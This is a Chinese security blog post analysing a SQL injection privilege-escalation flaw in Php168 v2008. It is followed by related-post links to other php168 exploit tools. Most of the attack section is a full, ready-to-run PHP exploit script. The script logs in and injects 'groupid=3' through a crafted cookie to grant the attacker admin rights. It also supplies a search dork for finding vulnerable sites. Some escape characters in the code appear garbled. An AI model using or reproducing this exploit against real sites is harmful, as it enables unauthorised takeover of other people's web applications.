php168v4.0漏洞,Php168 v2008 权限提升漏洞 's | CN-SEC 中文网

最新推荐文章于 2021-03-29 08:11:43 发布
最新推荐文章于 2021-03-29 08:11:43 发布
阅读量184 收藏
点赞数
文章标签: php168v4.0漏洞

简单分析下这个漏洞

common.inc.php if($_SERVER['HTTP_CLIENT_IP']){ $onlineip=$_SERVER['HTTP_CLIENT_IP']; }elseif($_SERVER['HTTP_X_FORWARDED_FOR']){ $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $onlineip=$_SERVER['REMOTE_ADDR']; } $onlineip = preg_replace("/^([/d/.]+).*/", "//1", filtrate($onlineip)); //这个地方使用preg_replace存在着安全隐患,之前就暴过漏洞,官方修补的方法是用filtrate函数处理了下$onlineip

看一下filtrate函数是怎么处理的

function.inc.php function filtrate($msg){ $msg = str_replace('&','&',$msg); $msg = str_replace(' ',' ',$msg); $msg = str_replace('"','"',$msg); $msg = str_replace("'",''',$msg); $msg = str_replace("",">",$msg); $msg = str_replace("/t","    ",$msg); $msg = str_replace("/r","",$msg); $msg = str_replace(" ","   ",$msg); return $msg; }

过滤了'”

common.inc.php if($usr_oltime>30||!$usr_oltime){ $usr_oltime>600 && $usr_oltime=600; include(PHP168_PATH."php168/level.php"); if( isset($memberlevel[$lfjdb[groupid]]) ){ $SQL=",groupid=8"; $lfjdb[money]=get_money($lfjuid); foreach( $memberlevel AS $key=>$value){ if($lfjdb[money]>=$value){ $SQL=",groupid=$key"; } } }else{ $SQL=""; } $db->query("UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='$onlineip',oltime=oltime+'$usr_oltime'$SQL WHERE uid='$lfjuid'"); //因为这个地方是拼接字符串的形式,所以可以使用/来转义',然后利用$usr_oltime来注射:)

另外要注意的是$usr_oltime有一个简单的判断的,而且还要保证sql语句的语法正确,看下我构造的语句:

UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='[/]',oltime=oltime+'[+31,groupid=3,introduce=0x70757265745f74 WHERE uid=2#]'$SQL WHERE uid='$lfjuid'

最后给个EXP:

#!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ Php168 <= v2008 update user access exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org dork: "Powered by PHP168" +---------------------------------------------------------------------------+ '); /** * works regardless of php.ini settings */ if ($argc < 5) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path user pass host: target server (ip/hostname) path: path to php168 user: login username pass: login password Example: php '.$argv[0].' localhost /php168/ +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $pass = $argv[4]; $resp = send(); preg_match('/Set-Cookie:/s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie); if ($cookie) if (strpos(send(), 'puret_t') !== false) exit("Expoilt Success!/nYou Are Admin Now!/n"); else exit("Exploit Failed!/n"); else exit("Exploit Failed!/n"); function rands($length = 8) { $hash = ''; $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'; $max = strlen($chars) - 1; mt_srand((double)microtime() * 1000000); for ($i = 0; $i < $length; $i++) $hash .= $chars[mt_rand(0, $max)]; return $hash; } function send() { global $host, $path, $user, $pass, $cookie; if ($cookie) { $cookie[1] .= ';USR='.rands()."/t%2b31,groupid=3,introduce=0x70757265745f74 WHERE uid=$cookie[2]#/t/t"; $cmd = ''; $message = "POST ".$path."member/userinfo.php HTTP/1.1/r/n"; $message .= "Accept: */*/r/n"; $message .= "Accept-Language: zh-cn/r/n"; $message .= "Content-Type: application/x-www-form-urlencoded/r/n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n"; $message .= "CLIENT-IP: ryat///r/n"; $message .= "Host: $host/r/n"; $message .= "Content-Length: ".strlen($cmd)."/r/n"; $message .= "Connection: Close/r/n"; $message .= "Cookie: ".$cookie[1]."/r/n/r/n"; $message .= $cmd; } else { $cmd = "username=$user&password=$pass&step=2"; $message = "POST ".$path."login.php HTTP/1.1/r/n"; $message .= "Accept: */*/r/n"; $message .= "Accept-Language: zh-cn/r/n"; $message .= "Content-Type: application/x-www-form-urlencoded/r/n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n"; $message .= "Host: $host/r/n"; $message .= "Content-Length: ".strlen($cmd)."/r/n"; $message .= "Connection: Close/r/n/r/n"; $message .= $cmd; } $fp = fsockopen($host, 80); fputs($fp, $message); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?>

玄晦
关注
php168sql注入漏洞
08-15
php168某版本存在sql注入,可通过该漏洞获取数据库信息
php168的一个漏洞
qq_15618849的专栏
03-10 1662
这个问题是程序员容易忽略的,往往只是依靠gpc或addslashes函数对用户直接输入的数据进行处理,这样数据中的'"等都会被\转义,这样就能正确的执行sql语句,有效防止注入攻击了。但存入数据库的数据呢?在执行完sql语句存入数据库的是经过gpc处理前的原始数据,那么当程序再select出的就是受污染的数据了,如果把select出的数据再执行sql语句,那么就触发了sqlinj,如果直接写入缓存
php168系统漏洞,php168某系统注入漏洞
weixin_28885435的博客
03-29 363
漏洞概要缺陷编号:WooYun-2012-013476漏洞标题:php168某系统注入漏洞相关厂商:PHP168漏洞作者:书生提交时间:2012-10-17 22:33公开时间:2012-10-17 22:33漏洞类型:SQL注射漏洞危害等级:高自评Rank:20漏洞状态:未联系到厂商或者厂商积极忽略Tags标签:漏洞详情披露状态:2012-10-17: 积极联系厂商并且等待厂商认领中,细节不对外...
PHP168 6.0及以下版本漏洞
CURSED!
09-23 245
PHP168 6.0及以下版本漏洞 # 鬼仔:未测试。最近比较忙,所以很多东西都更新不及时,也有好多没贴上来,抱歉,这几天整理下,把积攒的都更新了。 来源:chinesehonker 危险等级:高 影响版本:PHP168 6.0以下版本 入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。 测试语...
php 168,PHP168一个神奇的漏洞,可查询任意用户数据
weixin_39914107的博客
03-10 1201
国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile以PHP168官方演示站点为例,查看任意用户信息的页面...
Php168 v2008
09-12
Php168 v2008,从互联网下载这些cms搭建在自己的虚拟机中,文件夹中存放的内容:a实训报告、b、下载的cms网站、c、安装成功的网站文件、d、网站数据库(mysql data目录下的文件、sqlserver data目录下的数据库文件)
Hyper-V集成服务vmguest.iso
10-29
用于解决hyper-v虚拟机中像是xp系统或者server2003等系统。无法正常使用网络服务。Win10自带的Hyper-v挺好用的,就是装XP的时候没有驱动上不了网,装这个集成服务(vmguest.iso )就可以了,相当于Vm的Vmtools.iso.
这是一个很好的php168 cms系统v2008
10-20
这是一个很好的php168 cms系统v2008,很不错的哦,拿来和大家共享一下,还有更多的资源:QQ530556995
五子棋网页游戏PHP版 onWeb v2008
05-09
内容索引:PHP源码,游戏娱乐,五子棋,网页游戏 网页版的五子棋游戏,基于Flash+PHP+TXT,用TXT临时记录数据,打开网页给自己起一个名字就可以进入游戏了,不需要安装任何客户端!同时对此有兴趣的朋友,也可以好好...
php168v4.0漏洞,PHP168 V4.0 cookie欺骗 EXP
weixin_35958479的博客
03-10 294
漏洞的原理:具体的请看admin/global.php这个文件里面关于用户登陆部分的代码,这里截取一下。。。/*用户登录*/if($_POST[loginname]&&$_POST[loginpwd]){if($webdb[yzImgAdminLogin]){if(!get_cookie("yzImgNum")||get_cookie("yzImgNum")!=$yzi...
PHP168 0Day 文件代码泄露漏洞利用工具
03-24
PHP168 0Day 文件代码泄露漏洞利用工具
php168下载任意文件漏洞利用工具
05-22
php168下载任意文件 内部用的。。现在共享上来 拿积分的,点击查看代码后 等上三秒钟 如果有漏洞就可以看到对方的源代码了。。。
Php168代码执行漏洞,Vulnhub-ThinkPHP 2.x 任意代码执行漏洞
weixin_39637711的博客
03-27 204
郑重声明:所用漏洞环境为自建虚拟机vulnhub靶机环境,仅供本人学习使用。漏洞简述ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));导致用户的输入参数被插入双...
php168 6.02漏洞,PHP168 V6.02整站系统远程执行任意代码漏洞
weixin_30695935的博客
03-11 871
PHP168在某些函数里运用了eval函数,但是某数组没有初试化,导致可以提交任意代码执行.漏洞出在inc/function.inc.php里面.get_html_url()这个函数.function get_html_url(){global $rsdb,$aid,$fidDB,$webdb,$fid,$page,$showHtml_Type,$Html_Type;$id=$aid;if($pa...
php168上传漏洞,CVE-2009-2265 FCKeditor connector.php任意文件上传漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安全资讯平台...
weixin_40002692的博客
03-28 408
### $Id: coldfusion_fckeditor.rb 11127 2010-11-24 19:35:38Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the...
php168 6.02漏洞,PHP168 V6.01/6.02權限提升及暴本地路徑漏洞
weixin_39684235的博客
03-11 211
摘要:發布日期:2010-12.15 發布作者:佚名 影響版本:PHP168 V6.01/6.02 官方網站:http://www.php168.net漏洞類型:設計錯誤 漏洞描述:PHP168整站是PHP領域當前功能最強大的建站系統,代碼全部開源,可極其方便的進行二次開發,所有功能模塊可以自由安裝與刪...發布日期:2010-12.15發布作者:佚名影響版本:PHP168 V6.01/6.02...
php168 blog,PHP168 CMS的一次新异漏洞分析
weixin_32019949的博客
03-20 349
作者:李丰初admin/global.php对后台管理的用户名与密码没有任何过滤产生了这个漏洞if( $_POST[loginname] && $_POST[loginpwd] ){if( $webdb[yzImgAdminLogin] ){if(!get_cookie("yzImgNum")||get_cookie("yzImgNum")!=$yzimg){die("验证码不符合...
php168上传漏洞,Phpcms_V9任意文件上传漏洞的利用以及小小的分析
weixin_39646412的博客
03-28 330
本帖最后由 小爱_Joker 于 2017-4-10 10:05 编辑去年的漏洞复现了 本地环境搭建在官方下载的最新版本phpcms源码我冒着生命危险 放出的0dayQQ图片20170410171149.jpg (14.64 KB, 下载次数: 81)2017-4-10 17:11 上传各位看完后 记得评论下QQ截图20170410163900.png (56.14 KB, 下载次数: 92)...
php 任意文件读取漏洞,Php168 读取任意文件漏洞
weixin_42502040的博客
03-12 252
转载地址:http://hi.baidu.com/saiy_hi/哦,忘记说了,程序官方URL:http://www.php168.com/#代码:..job.php Line:117 if( eregi(".php",$url) ){ die("ERR"); } $fileurl=str_replace($webdb[www_url],"",$url); i...
Windows 7上Hyper-V Manager的安装教程与RSAT工具详解
在Windows 7系统上安装Hyper-V Manager是管理虚拟化技术的关键步骤,尤其是对于那些希望在非服务器环境下操作Windows Server 2008 R2、2008或2003服务器功能的管理员而言。首先,你需要下载并安装Microsoft Remote ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值